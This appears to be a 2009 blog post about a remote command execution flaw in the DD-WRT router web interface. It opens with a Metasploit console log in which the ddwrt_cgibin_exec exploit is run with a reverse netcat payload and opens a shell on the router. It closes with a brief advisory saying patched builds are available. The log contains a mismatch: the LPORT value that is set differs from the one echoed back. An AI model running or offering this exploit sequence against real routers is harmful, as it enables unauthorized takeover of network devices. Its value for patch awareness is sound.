Sunday, 26 July 2009
msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened (192.168.1.1:4444 -> 192.168.1.12:4312)
Linux DD-WRTx86CI 126.96.36.199dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown
As reported at www.milw0rm.com there is a vulnerability in the http-server for the DD-WRT management GUI that can be used for execution of an exploit to gain control over the router.
They guys over at dd-wrt have fixed the issue and generated new builds of the latest DD-WRT version. You can temporarily download the these files from here until we did update the router database.
[UPDATE] The guys over at dd-wrt have integrated most of the fixed build files into the router database. You can check there if files for build 12533 are available for your router. If not (yet) please check the location mentioned above to obtain the files.